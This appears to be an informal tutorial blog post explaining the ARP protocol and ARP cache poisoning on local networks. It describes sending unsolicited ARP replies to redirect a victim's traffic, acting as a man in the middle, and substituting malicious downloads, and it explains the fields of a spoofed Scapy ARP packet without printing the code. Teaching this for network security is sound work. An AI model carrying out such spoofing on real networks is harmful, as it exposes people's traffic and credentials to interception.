In Today’s post, I would like to talk about security, but in relation to networking, so we would be able to see an intriguing attack vector in the protocol of ARP for LAN networks.
Before starting to read this article I strongly suggest you read the networking article we had a long journey with:
In this article we’re going to do some python scripting, meet the ARP protocol and Scapy library, so without any further a due let’s get into it 🙂
How does normal LAN works
When a computer wishes to initiate a connection to another computer inside the LAN, he only has the IP address of that machine.
In order to send anything to another computer on our LAN, we need that computer MAC address as well.
But if we only have the IP, how do we get the MAC? Hello ARP 🙂
ARP (Address Resolution Protocol) is a very simple protocol, which allows us to send to all endpoints inside our LAN the following request — “The guy who has the IP x.x.x.x, please return me your MAC address”
So when you want to open some sort of connection, you need to have that machine MAC address as said before.
ARP to the rescue!
Each time a endpoint requests the LAN for a MAC address, and he receive a response back, the receiving endpoint of that ARP reply, stores the response(MAC Address and IP) inside it’s ARP table.
The ARP table, as you might have all ready guessed, allows for faster response in terms of communications, so when a new request wished to be made, the endpoint looks inside it’s ARP table instead of sending a ARP request in the LAN, which by that allows to send the request directly instead of initiating the flow which described above.
So the use of the ARP table allows to cache previous requests/responses and allow faster communications.
Well this feature of ARP is pretty awesome, but is also has troublesome feature which we will discuss later 🙂
How does ARP do what he does?
ARP works in a stateless way, which means, what he gets he operates with it without any concern of previous messages or any other behavior which handles a flow of ARP messages.
Basically, he doesn’t have some sort of state management which by that he doesn’t follows or analyze the flow of messages, so when something comes he handles it anyway.
When ARP is requesting a MAC address correlating to an IP address, he actually sends a ARP request type message, which asks by a broadcast message on the LAN, to get the MAC address by a IP, which looks like this in Wireshark:
In this example we ask from the endpoint which has the IP 172.20.13.122, to send us back it’s MAC address to the address 172.20.0.31, which is us.
When the endpoint with the IP 172.20.13.122 will receive our request, he will response back with a ARP reply type message which has it’s MAC address.
The response message is pretty simple as well. It simply has a “linked” IP address of the IP queried in the original ARP request, to a MAC address of the station which responded back, and the response itself looks like this:
The beautiful part that we mentioned in a short manner, that ARP is a stateless protocol.
Hmmm… so what if we send a ARP reply without a ARP request in first the place?
Does it will change the ARP table of the receiving station, so the ARP reply packet will change accordingly to the provided IP it’s new MAC address?
Yes it will change the MAC address.
If we send a ARP reply to a station which changes a MAC of a real machine X to our station Y MAC address, all designated traffic for endpoint X will go to Y, which is simply us.
Isn’t that great? LOL just kidding 🙂
As you can see, it’s pretty simple to fool endpoints with changing the MAC address of their ARP table.
So you might be wondering, why didn’t anyone removed ARP and developed a new protocol instead, or added some kind of security mechanisms?
Your question is a great and the simple answer is because ARP delivers the wished functionality and he does pretty well.
Today in order to breach to LAN network, it’s not impossible but it’s pretty a hard job to do it, regarding firewalls or breaching to a business building, so it’s that simple to achieve LAN access.
But, many Operating system as of today, are making sure to send many ARP requests/reply’s all the time, so to make sure that no one fooled her and changed her ARP table in some manner.
So how do we can mess with ARP for fun?
Well after we’ve found out what ARP does, what can we do with that?
Well the options are really endless, because today when your computer/IPTV/Mobile or everything that is sitting in your LAN network, is not safe from ARP poisioning.
Imagine for example, we tell a mobile phone that the router of our house(LAN), is actually our PC.
When you will do that, all the traffic which supposed to be sent to the router, will be sent to our PC.
Interesting… but what will happen to traffic?
Well, if you do not forward that data, it will simply be “dropped” on the receiving PC, and the mobile phone user will know something is wrong.
So if you do wish to let the attacked endpoint feel like everything is fine, you do can tell the PC to forward the data as needed, so the mobile phone user keeps it’s web searching has demanded, and you’re acting as a man in the middle, which receives everything that he sends or receive.
When you will do data forwarding, the receiving PC is gonna go by the wished IP to the MAC address in his ARP table, and it will look like a simple access to the network router or some other gateway which gives us local network resources, cool right? 😉
Further use cases
Imagine that you want to download a file from some website, for example Whatsapp application for desktop.
What if, an attacker in your LAN has done a ARP spoofing on you, so when you initiated a HTTP request to download the installation file, the attacker will receive the response, and replace the URL which Whatsapp have given, with another URL for a file of his own.
Let’s just say the file we actually downloaded which has a awesome Whatsapp icon and it’s actually a virus, and we don’t have a AntiVirus installed on our PC.
What do you think will happen when we will execute that installation file?
That’s a great question and the gruesome truth that anything could happen.
The attacker could have written:
- Ransomware — Encrypts our entire PC and asks for money.
- Key logger — Tracks our keyboard input and worse tracks which websites we go in, so for example when we go to our back account, and he in someway understands that, he can simply steal our bank account credentials.
Off course there are many more examples but these are some famous examples.
A fun and short example
In python, we have a cool project which is called Scapy.
Scapy is a simple interface to initiate network communications and allow access to all the wished data, which is been sent/received by Scapy.
In this example we can see the that we build a ARP reply packet with Scapy.
Variables explanation:
- op — Tells which ARP packet type we want Scapy to build for us.
As we can see it’s value is 2(the variable I used) so we build a ARP reply. - pdst — The IP of the attacked endpoint.
- hwdst — The MAC address of the attacked endpoint.
- psrc — The IP which the attacked machine will go to.
You might be asking… where is the MAC address which we fool the attacked machine?
Scapy takes care of that for us. He adds in the packet after the packet has been built, another field which holds the sending PC(the attacker) MAC address.
This way Scapy tells the attacked endpoint that the attacker MAC address is at the spoofed IP address (psrc field).
Conclusion
Today many operating systems net stack and the OS itself has many mechanisms to deal with ARP spoofing attacks, so it’s kind of hard to implement them easily, so don’t think that after we’ve learned how to implement this attack we’re now the hacker of the day 🙂
Moreover, one main thing that I’ve wanted to show, is that security breaches might sound very complex or impossible to do, but it actually isn’t that hard.
Because, once you’ve understood what is going on under the hood, you can actually do very cool things which could be not very, depends on how you use those skills.
So we actually saw how to do a simple attack in 1 simple line, which is cool but it gives us the understanding, that a lot of more attacks are easy to execute. It all depends on how you understand the flow of the things you want to crack, because then you are the master of the game 🙂
Now, I do wish you don’t use this knowledge for bad practices and only for learning experience, so you will enhance your knowledge in the field of network security, and not for bad reasons.
Just adding a disclaimer which says that I’m not responsible for how you use this article knowledge
As always, I do hope you enjoyed reading this piece, and if you have any suggestion to improve this article so everyone else will enjoy it and have a better experience, I’ll be very glad to hear 🙂
Thank you again and have a great day!